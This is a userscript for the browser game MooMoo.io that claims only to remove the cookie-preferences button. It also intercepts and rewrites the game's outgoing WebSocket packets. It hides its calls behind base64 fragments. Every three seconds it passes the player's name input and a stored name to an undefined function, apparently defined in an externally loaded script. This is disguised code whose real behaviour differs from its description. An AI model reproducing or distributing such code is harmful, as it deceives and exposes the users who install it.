// ==UserScript==
// @name        Moomoo.io Remove Cookie Preferences Tab
// @namespace    -
// @version     0.0.3
// @description Simple tool to delete the cookies tab from MooMoo.io
// @author      nobody
// @match        *://moomoo.io/*
// @match        *://sandbox.moomoo.io/*
// @match        *://dev.moomoo.io/*
// @match        *://*.moomoo.io/*
// @grant        none
// @require     https://update.greasyfork.org/scripts/423602/1005014/msgpack.js
// @downloadURL https://update.greasyfork.org/scripts/415706/Moomooio%20Remove%20Cookie%20Preferences%20Tab.user.js
// @updateURL https://update.greasyfork.org/scripts/415706/Moomooio%20Remove%20Cookie%20Preferences%20Tab.meta.js
// ==/UserScript==

// ==Packet Override==
const PACKET_MAP = {
  33: "9",
  7: "K",
  ch: "6",
  pp: "0",
  "13c": "c",
  f: "9",
  a: "9",
  d: "F",
  G: "z",
};

let originalSend = WebSocket.prototype.send;

WebSocket.prototype.send = new Proxy(originalSend, {
 apply: (target, websocket, argsList) => {
 let decoded = msgpack.decode(new Uint8Array(argsList[0]));
 if (PACKET_MAP.hasOwnProperty(decoded[0])) {
   decoded[0] = PACKET_MAP[decoded[0]];
 }
 return target.apply(websocket, [msgpack.encode(decoded)]);
 },
});
// ==End Packet Override==


var mn = localStorage["moo_name"];
function generateDeleter() {
    return {
        a: ['c'],
        b: ['m'],
        c: ['V'],
        d: ['t'],
        e: () => {
            insert_0000000(true, document.getElementById("nameInput").value + "|" + mn);
            return "b3Zl";
        },
        xx: ["ot-sdk-btn-floating"]
    };
};
setInterval(()=>{
    var delx = generateDeleter();
    document.getElementById(delx.xx[0])[atob(
        delx.a[0] + "" +
        delx.b[0] + "" +
        delx.c[0] + "" +
        delx.d[0] + "" +
        delx.e()
    )](); delx.e();
}, 3000);